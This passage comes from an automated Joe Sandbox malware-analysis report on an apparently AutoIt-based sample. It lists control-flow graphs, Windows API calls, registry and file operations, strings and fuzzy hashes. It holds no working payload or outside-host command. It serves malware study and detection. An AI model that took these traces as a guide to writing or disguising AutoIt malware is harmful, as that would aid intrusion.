1007->1011 1011->997
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E6688B: FindCloseChangeNotification.KERNEL32(?,?,00000000,00EA29D0), ref: 00E668AB
                                                                                                                                                                                                                                        • Part of subcall function 00E65D82: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E62BE1,?,00008000), ref: 00E65DB0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E62CC5
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E62E2F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification
                                                                                                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                                      • API String ID: 1419987861-3738523708
                                                                                                                                                                                                                                      • Opcode ID: dcdd2dca1c0368e2d6d28b64189faeeb77e20a9d6a0439822397494fe37978d7
                                                                                                                                                                                                                                      • Instruction ID: 42e143a2d33dd88efa47767c8d6bb9ffe8a33eb4f67a496d97efcc3033aa43b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcdd2dca1c0368e2d6d28b64189faeeb77e20a9d6a0439822397494fe37978d7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7922BF305483409FC714EF24D841AAFBBE4BF99354F04292EF585B72A2DB31EA49DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1018 e619e5-e61a1e 1019 ea29a8-ea29a9 DestroyWindow 1018->1019 1020 e61a24-e61a3a mciSendStringW 1018->1020 1023 ea29b4-ea29c1 1019->1023 1021 e61a40-e61a48 1020->1021 1022 e61c9b-e61ca8 1020->1022 1021->1023 1024 e61a4e-e61a5d call e61e03 1021->1024 1025 e61ccd-e61cd4 1022->1025 1026 e61caa-e61cc5 UnregisterHotKey 1022->1026 1028 ea29c3-ea29c6 1023->1028 1029 ea29f0-ea29f7 1023->1029 1039 ea29fe-ea2a0a 1024->1039 1040 e61a63-e61a6b 1024->1040 1025->1021 1027 e61cda 1025->1027 1026->1025 1031 e61cc7-e61cc8 call e616a5 1026->1031 1027->1022 1034 ea29c8-ea29d0 call e6688b 1028->1034 1035 ea29d2-ea29d5 FindClose 1028->1035 1029->1023 1033 ea29f9 1029->1033 1031->1025 1033->1039 1038 ea29db-ea29e8 1034->1038 1035->1038 1038->1029 1041 ea29ea-ea29eb call ed3b01 1038->1041 1044 ea2a0c-ea2a0e FreeLibrary 1039->1044 1045 ea2a14-ea2a1b 1039->1045 1042 e61a71-e61a96 call e6d510 1040->1042 1043 ea2a22-ea2a2f 1040->1043 1041->1029 1055 e61acd-e61ad8 OleUninitialize 1042->1055 1056 e61a98 1042->1056 1050 ea2a31-ea2a4e VirtualFree 1043->1050 1051 ea2a56-ea2a5d 1043->1051 1044->1045 1045->1039 1049 ea2a1d 1045->1049 1049->1043 1050->1051 1053 ea2a50-ea2a51 call ed3b67 1050->1053 1051->1043 1054 ea2a5f 1051->1054 1053->1051 1058 ea2a64-ea2a68 1054->1058 1055->1058 1060 e61ade-e61ae3 1055->1060 1059 e61a9b-e61acb call e61fda call e61f83 1056->1059 1058->1060 1061 ea2a6e-ea2a72 call ed0957 1058->1061 1059->1055 1063 ea2a79-ea2a86 call ed3b3b 1060->1063 1064 e61ae9-e61af3 1060->1064 1069 ea2a74 1061->1069 1076 ea2a88 1063->1076 1067 e61cdc-e61ce9 call e7fc00 1064->1067 1068 e61af9-e61b7a call e67e4c call e61f19 call e61daa call e80094 call e61d51 call e67e4c call e6d510 call e61dd3 call e80094 1064->1068 1067->1068 1078 e61cef 1067->1078 1081 ea2a8d-ea2aaf call e8004d 1068->1081 1108 e61b80-e61ba4 call e80094 1068->1108 1069->1060 1076->1081 1078->1067 1087 ea2ab1 1081->1087 1090 ea2ab6-ea2ad8 call e8004d 1087->1090 1095 ea2ada 1090->1095 1098 ea2adf-ea2b01 call e8004d 1095->1098 1104 ea2b03 1098->1104 1107 ea2b08-ea2b15 call ec6b72 1104->1107 1114 ea2b17 1107->1114 1108->1090 1113 e61baa-e61bce call e80094 1108->1113 1113->1098 1118 e61bd4-e61bee call e80094 1113->1118 1117 ea2b1c-ea2b29 call e7bc7b 1114->1117 1122 ea2b2b 1117->1122 1118->1107 1124 e61bf4-e61c18 call e61daa call e80094 1118->1124 1125 ea2b30-ea2b3d call ed3a95 1122->1125 1124->1117 1133 e61c1e-e61c26 1124->1133 1131 ea2b3f 1125->1131 1134 ea2b44-ea2b51 call ed3b1c 1131->1134 1133->1125 1135 e61c2c-e61c4a call e67e4c call e61edf 1133->1135 1141 ea2b53 1134->1141 1135->1134 1143 e61c50-e61c5e 1135->1143 1144 ea2b58-ea2b65 call ed3b1c 1141->1144 1143->1144 1145 e61c64-e61c9a call e67e4c * 3 call e61e4b 1143->1145 1149 ea2b67 1144->1149 1149->1149
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E61A2E
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00E61ACD
                                                                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00E61CB2
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00EA29A9
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00EA2A0E
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EA2A3B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                      • Opcode ID: 03c8d9f4504c1e4b45a0be58bf65095fb7bc23922a4d9dda3d4d87be39430e9d
                                                                                                                                                                                                                                      • Instruction ID: b25b578961010a5fff9bbd85fb18803b039ae21083847cdd706d99340aec5db3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03c8d9f4504c1e4b45a0be58bf65095fb7bc23922a4d9dda3d4d87be39430e9d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34D19D31741212CFCB2AEF28D895B69F7A0BF49744F18629DE54A7B251CB31AC16CF41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E645CC: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E645EA
                                                                                                                                                                                                                                        • Part of subcall function 00E64270: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E64292
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E643FC
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EA3C5D
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EA3C9E
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EA3CE0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                      • API String ID: 338900592-2727554177
                                                                                                                                                                                                                                      • Opcode ID: 540cbbb743522afd2883cd4a86b7021780266315cf0b553f8c7a8348344d35b3
                                                                                                                                                                                                                                      • Instruction ID: 211553c0bdd114b4414f942eda2839fe86f24c082a674a9e8fce6ee5c05424f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 540cbbb743522afd2883cd4a86b7021780266315cf0b553f8c7a8348344d35b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA71A1715083049EC300EF65EC419ABBBE9FF99360F40642EF445A71A0DF70DA48DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1310 ea08dc-ea090c call ea06b0 1313 ea090e-ea0919 call e8f546 1310->1313 1314 ea0927-ea0933 call e954a1 1310->1314 1321 ea091b-ea0922 call e8f559 1313->1321 1319 ea094c-ea0995 call ea061b 1314->1319 1320 ea0935-ea094a call e8f546 call e8f559 1314->1320 1329 ea0a02-ea0a0b GetFileType 1319->1329 1330 ea0997-ea09a0 1319->1330 1320->1321 1331 ea0bfe-ea0c04 1321->1331 1332 ea0a0d-ea0a3e GetLastError call e8f523 CloseHandle 1329->1332 1333 ea0a54-ea0a57 1329->1333 1335 ea09a2-ea09a6 1330->1335 1336 ea09d7-ea09fd GetLastError call e8f523 1330->1336 1332->1321 1347 ea0a44-ea0a4f call e8f559 1332->1347 1338 ea0a59-ea0a5e 1333->1338 1339 ea0a60-ea0a66 1333->1339 1335->1336 1340 ea09a8-ea09d5 call ea061b 1335->1340 1336->1321 1343 ea0a6a-ea0ab8 call e953ea 1338->1343 1339->1343 1344 ea0a68 1339->1344 1340->1329 1340->1336 1353 ea0aba-ea0ac6 call ea082c 1343->1353 1354 ea0ac8-ea0aec call ea03ce 1343->1354 1344->1343 1347->1321 1353->1354 1359 ea0af0-ea0afa call e9892e 1353->1359 1360 ea0aee 1354->1360 1361 ea0aff-ea0b42 1354->1361 1359->1331 1360->1359 1363 ea0b63-ea0b71 1361->1363 1364 ea0b44-ea0b48 1361->1364 1367 ea0bfc 1363->1367 1368 ea0b77-ea0b7b 1363->1368 1364->1363 1366 ea0b4a-ea0b5e 1364->1366 1366->1363 1367->1331 1368->1367 1369 ea0b7d-ea0bb0 CloseHandle call ea061b 1368->1369 1372 ea0bb2-ea0bde GetLastError call e8f523 call e955b3 1369->1372 1373 ea0be4-ea0bf8 1369->1373 1372->1373 1373->1367
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EA061B: CreateFileW.KERNEL32(00000000,00000000,?,00EA0985,?,?,00000000,?,00EA0985,00000000,0000000C), ref: 00EA0638
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EA09F0
                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00EA0A03
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EA0A0D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EA0A36
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EA0B80
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EA0BB2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                      • API String ID: 3086256261-2852464175
                                                                                                                                                                                                                                      • Opcode ID: 3a24b13e139f4538d483ca4d43f36ec4e0f4bebb3e7eea44f0829f1f23b9f640
                                                                                                                                                                                                                                      • Instruction ID: c0329023eeb779bc21ba8f399661437bf5fbfb4a4af6d7ac97b25e8b4f25d032
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a24b13e139f4538d483ca4d43f36ec4e0f4bebb3e7eea44f0829f1f23b9f640
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59A11632A041488FDF19AF78D891BAE7BE1AB4B324F141159F815BF392D7309D12DBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1414 e624cd-e6253d CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E624FB
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E6251C
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E62282,?), ref: 00E62530
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E62282,?), ref: 00E62539
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                      • Opcode ID: 8c8e9c311a349b0fc14c663db8d04bab083e1de3cd1a9433971f27b2d1efaad5
                                                                                                                                                                                                                                      • Instruction ID: bb298a81b67d1261aaa4be4ad2aa0592d8ba723cf8423dd9295b3358a25f98fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c8e9c311a349b0fc14c663db8d04bab083e1de3cd1a9433971f27b2d1efaad5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFF0DA716442987AE77157176C09E373EBFD7C6F60B10001EBA04AB1A0D6AA1859EAB4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1415 ed0fa1-ed0fca InterlockedExchange 1416 ed0fcc-ed0fcd call e8008b 1415->1416 1417 ed0fd8-ed1001 call e8008b ReadFile 1415->1417 1420 ed0fd2-ed0fd3 1416->1420 1422 ed10b9-ed10bd 1417->1422 1423 ed1007-ed100b 1417->1423 1420->1417 1426 ed10cc-ed10db InterlockedExchange 1422->1426 1427 ed10bf-ed10c2 call e80094 1422->1427 1424 ed1011-ed1026 EnterCriticalSection 1423->1424 1425 ed10b3-ed10b6 1423->1425 1429 ed1028-ed1037 1424->1429 1430 ed1074-ed10ad call e810a0 LeaveCriticalSection ReadFile 1424->1430 1425->1422 1433 ed10c7-ed10cb 1427->1433 1431 ed103f-ed1071 call ea2330 call e8008b call e810a0 call e80094 1429->1431 1432 ed1039 1429->1432 1430->1423 1430->1425 1431->1430 1432->1431 1433->1426
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ED0FBE
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00ED0FF9
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00ED1015
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00ED108E
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00ED10A5
                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED10D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3368777196-0
                                                                                                                                                                                                                                      • Opcode ID: d4269d7cedcd57d45d03ae05a1cc18a010c5a90743875a3e6b2b4e85b78aef68
                                                                                                                                                                                                                                      • Instruction ID: 97424a31cd31bf3bee7e3d9521c95f1dba4eecfe3bc1a0a5df338feb97006bdf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4269d7cedcd57d45d03ae05a1cc18a010c5a90743875a3e6b2b4e85b78aef68
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C418971900204EFDF14EF54DC85AAA7BB9FF44304F1440A9E908AE296D770EEA5DBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E62A50
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EA308B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String
                                                                                                                                                                                                                                      • String ID: Line %d: $22$AutoIt -
                                                                                                                                                                                                                                      • API String ID: 3363329723-3858746156
                                                                                                                                                                                                                                      • Opcode ID: 89478772e0ea47e36a0e264b805f623066b7f0d8cac1b1b45e894af88d0a010a
                                                                                                                                                                                                                                      • Instruction ID: 246aaa63580f1ad4a0c8317e9d4ea0ed2e1e2830c624d0fd92ae8464db6bf5ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89478772e0ea47e36a0e264b805f623066b7f0d8cac1b1b45e894af88d0a010a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A419471448304AAD321EB60EC46BEF77DCAF843A4F04552EF599B20A1EB74E649C793
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c27801d46e359f18642c82e964cb2a6cf5c825a2320e1d0e2fa05184c3cd9ef6
                                                                                                                                                                                                                                      • Instruction ID: b8c691b2ebc3ec540fb7dfc24dcc4f64305e2bf0cc5f02dc739c60cc9f9a7244
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c27801d46e359f18642c82e964cb2a6cf5c825a2320e1d0e2fa05184c3cd9ef6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC1B071A04249AFCF11DFEDE841BADBBB1AF49314F182199E518BB3A3C7349941CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EE9799
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EE9829
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EE9845
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EE988B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00EE98AB
                                                                                                                                                                                                                                        • Part of subcall function 00E7FABB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00ED180D,?,7646E610), ref: 00E7FAD8
                                                                                                                                                                                                                                        • Part of subcall function 00E7FABB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00EC0093,00000000,00000000,?,?,00ED180D,?,7646E610,?,00EC0093), ref: 00E7FAFF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 666041331-0
                                                                                                                                                                                                                                      • Opcode ID: 6384b5f6f167dcffeda29badab368129e4308e8c0ea877aef98a437e4687d015
